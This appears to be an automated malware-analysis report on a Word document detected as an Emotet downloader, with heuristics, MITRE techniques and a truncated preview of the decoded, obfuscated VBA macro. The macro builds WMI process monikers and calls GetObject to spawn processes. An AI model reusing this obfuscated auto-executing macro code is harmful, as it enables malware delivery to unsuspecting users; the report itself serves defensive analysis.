Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample carries a critical ClamAV detection for Emotet, and high-severity heuristics indicate an AutoOpen VBA macro, which runs automatically when the document is opened. The VBA code is heavily obfuscated, but the GetObject call (the visible string fragments assemble a winmgmts:Win32_Process moniker) and the overall structure strongly suggest it is designed to download and execute a secondary payload, a common Emotet behavior. The file's metadata and the presence of VBA macros further support this assessment.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6865933-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6865933-0
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46054 bytes |

SHA-256 of macros.bas: b02305e3f83539b6f96d99888d4749d8d159092a20a204a132f2f00299c05144
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "O__99_58"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "T760850"
' The repeated Select Case blocks below compare uninitialized variables against
' fixed constants; they are obfuscation padding around the few meaningful lines.
Function i200263()
    Select Case R17__3__
        Case 914098063
            S_9_8057 = (W43616_4 * Fix(861198158 / CBool(f66749))) - F5603_ / Oct(273793350) / 947061154 + CStr(d9_2___5) - 556571683 + ChrB(q013__83)
    End Select
    Select Case W02_458
        Case 884128243
            M22808 = (v77_11 * Fix(90431152 / CBool(J936419_))) - m94799 / Oct(648396861) / 61957883 + CStr(W1464_52) - 485742884 + ChrB(q_9642)
    End Select
    Select Case Q_7233
        Case 389637077
            S_594__ = (o707_8_ * Fix(341883455 / CBool(i__6896))) - F093_547 / Oct(292794980) / 577289925 + CStr(k3__16_) - 933793964 + ChrB(s9_6088)
    End Select
    Select Case w10186
        Case 27643935
            u_8_089 = (A_18593 * Fix(941462333 / CBool(E_3726_1))) - p92946 / Oct(966816295) / 830531601 + CStr(Q14_131) - 414643824 + ChrB(v98390)
    End Select
    Select Case U3_4_4_3
        Case 446300500
            z37939 = (i7_93__5 * Fix(662189531 / CBool(H_1_34__))) - t856___ / Oct(134916042) / 105217098 + CStr(h2_508) - 779977807 + ChrB(u4___2)
    End Select
    Select Case n17_4_0
        Case 899724169
            z33__0_ = (w25_969 * Fix(601347652 / CBool(L038_7_8))) - l8_947 / Oct(225180255) / 585030365 + CStr(L78135) - 443688860 + ChrB(Z055____)
    End Select
    Select Case k954_1
        Case 133057382
            d0175_3_ = (U_4692 * Fix(634586370 / CBool(f4676432))) - z9_17_ / Oct(698094631) / 377012857 + CStr(t_89_43) - 448597283 + ChrB(J343_934)
    End Select
    Select Case E65_647
        Case 972184721
            i_0403_ = (f572308 * Fix(227084380 / CBool(t2585105))) - Z8_33__3 / Oct(691971548) / 522891320 + CStr(f9329524) - 873751269 + ChrB(N564464_)
    End Select
End Function
Function f_7___7(b2_270, I294_7)
    On Error Resume Next
    Select Case I_60__
        Case 598783694
            j__5_99_ = (a_3_312 * Fix(245290002 / CBool(r__07076))) - O6_9__ / Oct(588987429) / 484044637 + CStr(I281_6_) - 916487657 + ChrB(p9961_2)
    End Select
    Select Case R__8052
        Case 804925466
            U0_44_0 = (l84881 * Fix(250970646 / CBool(w013_8))) - I__3005 / Oct(145250280) / 375984152 + CStr(r75629_) - 51281922 + ChrB(L76___)
    End Select
    ' String fragments assemble a "winmgmts:Win32_ProcessStartup" WMI moniker
    b56078 = K47052 + "winmgmts:Win32" + D570_68 + "_ProcessStartup" + n02_83
    Select Case s93_7_21
        Case 570996463
            c_15_3_9 = (V53__9 * Fix(149251606 / CBool(F08015_8))) - v732_6_2 / Oct(548225770) / 909035258 + CStr(H_6751_) - 593779238 + ChrB(i093_211)
    End Select
    Select Case j7595__9
        Case 754827813
            h1767_51 = (J43_50_4 * Fix(999766760 / CBool(w0_69645))) - L_2_16 / Oct(472767058) / 780948741 + CStr(j2273291) - 151016956 + ChrB(n1205_1)
    End Select
    ' Second fragment-built moniker: "winmgmts:Win32_Process"
    Y3_8_2_8 = q9_33482 + "winmgmts:Win32" + X578059 + "_Process" + f69__880
    Select Case b20___
        Case 800181916
            a7_821_ = (h8____4 * Fix(368393990 / CBool(k9614_1))) - q7380___ / Oct(338505359) / 486620231 + CStr(C93__7) - 813143116 + ChrB(Y8_3_126)
    End Select
    Select Case q08615
        Case 92164014
            i735_45 = (b6__13 * Fix(422545899 / CBool(S_96581))) - c4452_7_ / Oct(352620018) / 774716109 + CStr(h5_3_94_) - 608471506 + ChrB(K__0_320)
    End Select
    Select Case o65_21
        Case 684598838
            R03162 = (A_735_2 * Fix(812240848 / CBool(i6__3702))) - i253___ / Oct(76875373) / 325078139 + CStr(c88_6_) - 948031817 + ChrB(N__3114)
    End Select
    ' WMI object retrieved via GetObject (the OLE_VBA_GETOBJ finding above)
    Set Z0_68157 = GetObject(R424__74 + b56078 + G17_02_)
    Select Case l0__65
        Case 868278654
            j8_2___ = (w___22_7 * Fix(55000238 / CBool(V__72_6_))) - Q46_5_9 / Oct(693191206) / 995521083 + CStr(h_425_9) - 892081185 + ChrB(M_0_006_)
    End Select
    Select Case o3375135
        Case 608276267
            m7_8051 = (U07_76_ * Fix(597775005 / CBool(P061__63))) - w50_3_68 / Oct(377773837) / 816807087 + CStr(I_61_51) - 903658428 + ChrB(o___57_)
    End Select
    Select Case A0_393
        Case 756217462
            B07321_1 = (z605_177 * Fix(614637756 / CBool(H8354114
' ... (truncated)
```